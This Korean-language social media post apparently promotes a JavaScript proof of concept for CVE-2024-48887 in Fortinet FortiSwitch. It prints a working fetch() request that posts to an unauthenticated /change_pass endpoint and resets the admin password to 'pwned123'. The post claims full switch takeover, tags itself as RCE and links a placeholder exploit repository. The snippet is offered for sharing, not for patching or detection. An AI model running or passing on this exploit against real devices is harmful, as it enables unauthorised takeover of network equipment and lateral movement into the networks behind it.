
취약한 Fortinet FortiSwitch GUI 엔드포인트에서 인가되지 않은 비밀번호 변경이 어떻게 유발될 수 있는지 보여주는 경량 JavaScript 스니펫입니다.
🚨 FortiSwitch CVE-2024-48887 PoC (JavaScript) 🚨
🔥 방금 가벼운 JavaScript 스니펫을 공개했습니다. 취약한 Fortinet FortiSwitch GUI 엔드포인트에서 인증 없이 비밀번호 변경이 어떻게 트리거될 수 있는지 보여줍니다.
🛠️ 취약점 정보: 공격자는 간단한 fetch() 요청을 구성하여 인증 없이 비밀번호 설정을 조작할 수 있으며, /change_pass 엔드포인트 변형을 직접 대상으로 합니다.
fetch('http://target-ip/change_pass', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
username: 'admin',
newpass: 'pwned123',
confirm: 'pwned123'
})
})
.then(res => res.text())
.then(data => console.log('Response:', data));
💡 영향: 전체 스위치 장악, 측면 이동 가능성, 네트워크 손상.
📁 레포지토리: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ 레포지토리에 별표를 누르고 정보보안 동료들과 공유하세요!
📢 전체 분석 및 실시간 알림은 @cybersecplayground를 통해 팔로우하세요.
#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground